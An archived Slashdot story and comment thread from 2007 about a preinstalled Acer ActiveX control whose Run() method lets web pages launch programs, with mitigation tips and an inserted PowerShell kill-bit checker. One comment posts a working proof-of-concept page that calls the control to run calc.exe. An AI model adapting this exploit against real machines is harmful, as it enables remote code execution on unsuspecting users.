
Acer May Be Bugging Computers 396

Posted by Zonk
from the might-want-to-look-into-this dept.
tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"
This discussion has been archived. No new comments can be posted.

  • But dude... (Score:5, Funny)

    by Thaidog (235587) <(slashdot753) (at) (nym.hush.com)> on Monday January 08, 2007 @01:47AM (#17504716)
    They're Ferrari's
  • by mallardtheduck (760315) <stuartbrockman@nOSPam.hotmail.com> on Monday January 08, 2007 @01:49AM (#17504740)
    I expect exploits for this to start appearing within days, if not hours...
  • by Phil246 (803464) on Monday January 08, 2007 @01:55AM (#17504766)
    Checked mine, it's present :( Anyone know if it's safe to make that file and its registry entry 'disappear'?
    • Safe (Score:2, Informative)

      by twitter (104583)

      Checked mine, it's present :( Anyone know if it's safe to make that file and its registry entry 'disappear'?

      Sure, just go get the Mepis Patch [mepis.org]. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.

      Really, do you think eliminating this one control will make your computer safe? Chances are there are copies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malic

      • by Phil246 (803464)
        No, but it will make it safer (if only a little) than leaving it there.
        I've set its kill bit in the meantime though
    • by valeurnutritive (1048314) on Monday January 08, 2007 @02:22AM (#17504954)
      To remove this from your machine.

      Go to Start > Run and type:
      regsvr32 -u lunchapp.ocx

      (-u for uninstall)
      • by Phil246 (803464)
        thank you :)
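
The two mitigations mentioned in the replies above (setting the kill bit, unregistering the control) can be checked from the registry. The following PowerShell is an added example, not code from the thread or from Acer: the function names are hypothetical, and the CLSID is the one quoted in the test page posted later in this discussion, with the stray space removed.

```powershell
# Added example: report how exposed one ActiveX control is to web pages,
# and optionally set its kill bit. Run from an elevated prompt to write.
$Clsid = '{D9998BD0-7957-11D2-8FED-00606730D3AA}'   # CLSID quoted in this thread

# Component categories a control registers to declare itself safe for web use.
$CatSafeScripting = '{7DD95801-9882-11CF-9FA0-00AA006C14B4}'
$CatSafeInit      = '{7DD95802-9882-11CF-9FA0-00AA006C14B4}'
$KillBit          = 0x400   # bit in "Compatibility Flags" that blocks IE from loading the control
$CompatRoot       = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
# Note: on 64-bit Windows, 32-bit IE reads the same keys under SOFTWARE\Wow6432Node,
# so that view has to be checked as well.

function Get-ActiveXExposure {   # hypothetical helper name
    param([Parameter(Mandatory = $true)][string]$Clsid)

    $classKey  = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $compatKey = "$CompatRoot\$Clsid"

    $server = $null
    if (Test-Path -LiteralPath "$classKey\InprocServer32") {
        # Default value of InprocServer32 is the path of the .ocx/.dll on disk.
        $server = (Get-Item -LiteralPath "$classKey\InprocServer32").GetValue('')
    }
    $flags = 0
    if (Test-Path -LiteralPath $compatKey) {
        $flags = [int](Get-Item -LiteralPath $compatKey).GetValue('Compatibility Flags', 0)
    }
    [pscustomobject]@{
        Clsid            = $Clsid
        Registered       = Test-Path -LiteralPath $classKey
        ServerPath       = $server
        SafeForScripting = Test-Path -LiteralPath "$classKey\Implemented Categories\$CatSafeScripting"
        SafeForInit      = Test-Path -LiteralPath "$classKey\Implemented Categories\$CatSafeInit"
        KillBitSet       = ($flags -band $KillBit) -ne 0
    }
}

function Set-ActiveXKillBit {    # hypothetical helper name
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(Mandatory = $true)][string]$Clsid)

    $compatKey = "$CompatRoot\$Clsid"
    if ($PSCmdlet.ShouldProcess($Clsid, 'Set ActiveX kill bit')) {
        if (-not (Test-Path -LiteralPath $compatKey)) {
            New-Item -Path $compatKey -Force | Out-Null
        }
        # Preserve any other compatibility flags already present on the key.
        $current = [int](Get-Item -LiteralPath $compatKey).GetValue('Compatibility Flags', 0)
        Set-ItemProperty -LiteralPath $compatKey -Name 'Compatibility Flags' `
            -Value ($current -bor $KillBit) -Type DWord
    }
}

Get-ActiveXExposure -Clsid $Clsid | Format-List
# Preview the change first, then rerun without -WhatIf to apply it:
# Set-ActiveXKillBit -Clsid $Clsid -WhatIf
```

A control that shows `Registered` and `SafeForScripting` as true with `KillBitSet` false is the exposed state the story describes; after `regsvr32 -u`, `Registered` should report false.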
  • The 4th USB port (Score:4, Interesting)

    by wikinerd (809585) on Monday January 08, 2007 @01:57AM (#17504782) Journal
    I once bought a Fujitsu-Siemens laptop with 3 USB ports, but when I opened it I noticed it had a non-visible 4th USB port near the hard disk that you needed a screwdriver in order to access. No mention of it in Fujitsu-Siemens' manuals and other documentation that I got with the laptop, and no mention of it on their website. Although visually hidden, the port was visible via diagnostics software. I thought that this could be one way to put a spy antenna or other device on a laptop (a USB port provides 500mA of power which is enough to power a large range of antennas and electronics). It could be used to put an anti-theft antenna revealing the laptop's location, to put a keylogger, or to put a backup device. In the end I just put a permanent flash key drive in it so I had a laptop with permanent flash storage in addition to the hard disk.
    • by mallardtheduck (760315) <stuartbrockman@nOSPam.hotmail.com> on Monday January 08, 2007 @02:06AM (#17504844)
      Could just be there for optional "built-in" bluetooth or Wifi. A USB module is probably cheaper than a Mini-PCI.
      Plus, if they do no wireless, Wifi-only and Wifi+BT models, with a single Mini-PCI slot, they would need both Wifi and Wifi+BT cards, if they have a "hidden" USB port, they only need to stock Wifi mini-PCI cards and USB bluetooth adapters, the same adapters that are sold independently.
    • Re: (Score:3, Insightful)

      by starwed (735423)
      When I bought a USB2 PCI card for my desktop, most models had a single internal USB port as well as all the external ones. I think this is pretty common, and nothing nefarious.
    • It's an appendix. (Score:5, Interesting)

      by Kadin2048 (468275) <slashdot.kadin@x[ ].net ['oxy' in gap]> on Monday January 08, 2007 @02:42AM (#17505076) Homepage Journal
      I think a lot of computers have internal ports that were put in there as part of the original board design, but were never taken advantage of during configuration or subsequent system design.

      In an old Mac of mine (G4 "Sawtooth"), there is an internal Firewire port right on the motherboard, even though there are virtually no (to my knowledge anyway) internal Firewire devices available. The most useful thing you can do with it is run it out to a dummy card-slot panel and give yourself an extra external port. (I suppose you could also run another HD by using a IDE to FW converter card, if you could find a small enough one.)

      It's there, I suspect, because when they were designing that mobo, it wasn't clear that Firewire would be used primarily for DV and external peripherals, and wouldn't become the internal-peripheral interconnect of choice. For all the designers knew, Firewire could have become like SATA is today, with hard drives being built for it natively. In that case, having one inside the case could be useful as hell (particularly since that machine has space for 4 or 6 internal 3.5" HDs and 2 removable-media drives). They had no way of knowing that it would end up being the electronics version of an appendix.

      I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.
      • Re: (Score:3, Informative)

        by Zouden (232738)
        I suspect if you were to look around closely at the first generations of a lot of technologies, you'd find a lot of things like this; design decisions made for possibilities that just didn't pan out, but were left there anyway.


        Like multiple camera angles on DVDs? There's even a 'camera' button taking up space on my remote.
        • Multiple Angles (Score:3, Insightful)

          by splutty (43475)
          This is getting to be way off topic, but seriously. It seems you don't know the primary reason of existence for DVDs, which is something that the multi angle button is used in quite a lot.

          Of course I'm talking about the driving force behind almost all new electronical inventions, the Pr0N.
        • Re: (Score:3, Funny)

          by Hoi Polloi (522990)
          I use it when watching my Simpsons DVDs. I like to see what the other camera angles caught during filming.

          The extras where Homer works up the live studio audience before filming a show are great too.
      • PHB == appendix (Score:5, Interesting)

        by TapeCutter (624760) on Monday January 08, 2007 @06:08AM (#17506050) Journal
        I know that some, but certainly not all, "hidden" hardware/software is the result of a PHB "work-around", I submit the following anecdote about illogical engineering vs optimal solutions....

        Many moons ago I worked on a large project where we supplied a logistics application along with 8000 laptops that we were also expected to maintain. The specs for the laptops were written into the $80M/5yr contract, in particular the contract specified "special" (ie: manufactured by our sister company) laptops with a 120M HDD. A thousand or so laptops were delivered immediately, I suspect this was mainly to garner a large initial payment, 800 were then stored in a warehouse by the customer for 2yrs while we wrote the software and ran a pilot with the other 200.

        When it came time to ramp up to full production we found we could no longer get 120M HDD's but could get 250M for the same price (the HDD's were third party PCMCIA cards that were supposed to be "pre-imaged" by the hardware guys). The Dilbert moment happened when a PHB with way too much time on his hands had to sign the purchase order and demanded 120M HDD's because "that's what it says in the contract". The solution was illogical but effective, we quietly arranged for our hardware friends to format the 250M physical drive into a 120M logical drive and ignore the remaining space (and told them why). A few PHB readable edits to the PO and hey presto a warehouse full of laptops with our software pre-installed on 120M drives and an extra PHB-invisible partition.

        Now throwing away half the drive is clearly illogical but in my mind it was the "optimal" solution, with the possible exception of a time consuming appendectomy that would gum up the workflow for weeks/months and could possibly result in a devil we didn't know taking over. I also say "optimal" because: The PHB believed he had asserted his authority over the project and a rival PHB in the sister company, all with just one demand. From what I recall he went off to pester someone else and gloat about it. Not only did it neuter the PHB but HR, the lawyers and the accountants were kept in their cages, the techies got a good laugh, and the customer remained oblivious to the whole fiasco.

        Finally, a year or so into production when the image size started to bloat towards the 120M limit, the same PHB asked for a costing to retrofit bigger drives, like any good salesman we umm'ed and ahh'ed then went off to "see what we could do" before announcing we could remotely activate a new D: drive on a standard update cycle using some simple "magic" and a couple of mandays labour. The news delighted the PHB who promptly added a manday for his own "time". We didn't even hint that it was his previous demand that had caused the current space squeeze, we simply saved our evidence in case an appendectomy was required at some future random impasse. We also saved all the "can do" brownie points for the next time we had to convince the same PHB that his proposed solution to some imaginary problem really, truly, is a "can't do" situation, regardless of what PC week says.
        • Re: (Score:3, Insightful)

          When it came time to ramp up to full production we found we could no longer get 120M HDD's but could get 250M for the same price (the HDD's were third party PCMCIA cards that were supposed to be "pre-imaged" by the hardware guys). The Dilbert moment happened when a PHB with way too much time on his hands had to sign the purchase order and demanded 120M HDD's because "that's what's it says in the contract". The solution was illogical but effective, we quietly arranged for our hardware friends to format the 2
  • by zappepcs (820751) on Monday January 08, 2007 @02:00AM (#17504814) Journal
    to think that Acer and others have not been doing this for years? Put on the tin foil hat now, they may be doing so in conjunction with governments. Let's not stop there, your ISP and phone company might also be doing the same thing?

    I bet that buried in the EULA somewhere is a statement about remote support or some other such thing that would negate any complaints about this code as far as culpability goes. Wonder what they will do now that the botnet boys know it's there? Just one more reason that people who want to have a safe computer should learn how to administer one properly... IMO.
    • Re: (Score:3, Insightful)

      by Telvin_3d (855514)
      While I agree with you in general paranoid principle, I think the last bit is a little naive. It's like saying that if you want to have a safe house, you should be able to build your own in order to make sure there is no secret explode-on-remote-command hardware installed. Yes, people need to pay a little attention, but this type of shit is above and beyond anything that should be expected.

      P.S. I want to see Holmes on Homes run across a secret explode-on-remote-command thing in an episode. That would mak
      • Re: (Score:3, Interesting)

        by zappepcs (820751)
        I was thinking that 'meh, Telvin is probably right' but I thought about it again. Not to take an opportunity to diss you or anyone, but rather to explain my point a bit better.

        Anyone, almost, can get a license to drive a car. The few that will put power steering fluid in their oil because they know nothing about cars will learn a very expensive lesson. There are many examples here where just a grounding of common sense would save people from very costly and perhaps embarrassing episodes. There are awards ev
  • Lessons learned... (Score:5, Insightful)

    by Anonymous Coward on Monday January 08, 2007 @02:11AM (#17504882)
    1) Whenever possible, build your own.

    2) When you can't build your own (laptops), *always* re-install your OS after purchasing a new computer, and for God's sake use a real install CD and not the recovery one provided by the manufacturer.
    • Re: (Score:3, Insightful)

      by GaryPatterson (852699)
      Excellent suggestion!

      So, for the other 99% of users (you know, the ones who just want a computer that does what it's advertised to do), what's the solution?
  • Can't...get...back...contr...Everything is Fine and Happy. Nothing to Worry About. Have a Nice Day!
         
  • by snicho99 (984884) on Monday January 08, 2007 @02:15AM (#17504912) Homepage
    Don't panic. It's not a method for launching applications.

    The original article failed to notice that it's a Lunch application. It's actually a throwback to when Acer briefly partnered up with 180solutions to deliver targeted pop-under sandwiches to hungry laptop owners. The idea being that after seventeen hours of trying to uninstall Bonsai Buddy the computer user would be debilitated through starvation and susceptible receptive to sp(iced h)am..

    The program was abandoned when Acer's engineers failed to perfect the wasabi-over-ip protocol - leaving the whole system unreliable and prone to bagel overrun.

  • SWAH!?! (Score:5, Funny)

    by foo fighter (151863) on Monday January 08, 2007 @02:21AM (#17504948) Homepage
    This news is unbelievable.

    Acer still makes computers? People still buy them?

    I remember Acer being a budget brand with a bad rep for quality and customer service back in the mid- to late-90s. I can't believe they are still a going concern.
     
    • by pchan- (118053)
      Acer is the number 4 maker of personal (ie, non-server) computers in the world, behind HP, Dell, and Lenovo and ahead of Apple. At least that's what the statistics say, I've yet to see anyone using an Acer.
      • I've yet to see anyone using an Acer.

        Look harder?
        Every other laptop I see these days is an Acer. Hell, I'm on an Acer right now (the Aspire series run Solaris fantastically).
        Quality's not bad on them these days and they're about half the price of the exact same laptop rebranded (Toshiba made a line of laptops that had the same hardware including case as the Aspires, I imagine they were just rebrands)
  • Late again! (Score:5, Informative)

    by whoever57 (658626) on Monday January 08, 2007 @02:32AM (#17505014) Journal
    Apparently, someone in Brazil noticed this last November [extremepc.com.br]
  • 1. Format your hard disk 2. Install Linux 3. Return your Windows for a refund (Profit!)
  • by mlts (1038732) on Monday January 08, 2007 @02:43AM (#17505082)
    On all new computers, be PCs, Suns, RS/6000s, or anything, after getting the machine out of the box and plugged in, I tar (or ghost in the case of PC recovery partitions) off anything preinstalled to two backups, then format the hard disk (or disks/arrays) on the machine. After the disks are formatted, I then install the OS and drivers and get the machine to the latest patches that I can via CDs. Only after this and a lockdown check does the machine see the network.

    I've just seen too many machines come pre-hosed from the factory. For anything that sees production use, I want to pack my own parachute and know exactly what is on the machine.

    On PCs, I try to find drivers from the underlying OEM rather than depend on the PC vendor, as usually the PC vendor's drivers tend to be outdated, except for motherboard/system board/IO planar flash.
  • Anyone would be that utterly deceptive...I mean...certainly not a manufacturer of hardware...or certainly not a major software developer...uh...oh, I forgot, except for those accidental bugs in the OS software...and indeed the unfortunate BBBBrowser.
  • Notice that in the article if you have IE7 it'll stop the attack since the user will be notified the page executes an unknown ActiveX and ask for permission (in the yellow creeping bar) before doing anything.

    Of course IE7 is only at 20% vs IE6 at more than 60%, but still, shows the browser going in the right direction.
  • On behalf of Acer (Score:3, Insightful)

    by Qbertino (265505) on Monday January 08, 2007 @03:55AM (#17505470)
    Acer is one of the 'big name' Laptop producers that actually sell Laptops with Linux preinstalled that are generally available and visible [alternate.de] and don't require placement of a special order at headquarters overseas. And they let you notice the price difference to the same models with Windows on them.
    Solution to this 'bug': If you buy an Acer, buy one that comes with Linux.
  • pre-owned? (Score:5, Funny)

    by BigBuckHunter (722855) on Monday January 08, 2007 @04:58AM (#17505770)
    Kinda changes the definition of a "pre-owned" machine!

    BBH
  • Test/exploit code (Score:4, Informative)

    by Koyaanisqatsi (581196) on Monday January 08, 2007 @07:54AM (#17506598)
    The code to test for the vulnerability, right from the Brazilian article about it linked on another post. Save it as an html file and browse it with IE.

    <html>
    <body>
    <object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
    </object>
    <script>
    hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
    </script>
    </body>
    </html>

  • by GreatBunzinni (642500) on Monday January 08, 2007 @11:09AM (#17508280)
    When I read this message what popped right on my mind was the existence of an administrator account which came pre-installed on my Acer laptop. The account is called "ASP.NET Machine A..." which is protected by a password and I'm not able to uninstall it no matter what I try. Can this be another Acer backdoor installed on their systems?

    P.S.: The article's backdoor was also present on my system. Those bastards...
    • Re: (Score:3, Interesting)

      No.

      That's just what happens when you install the .NET framework. Apparently you have to run as an administrator to use some of the .NET controls. Solution: Make a .NET account with administrator privileges.

      Pretty cool, huh?
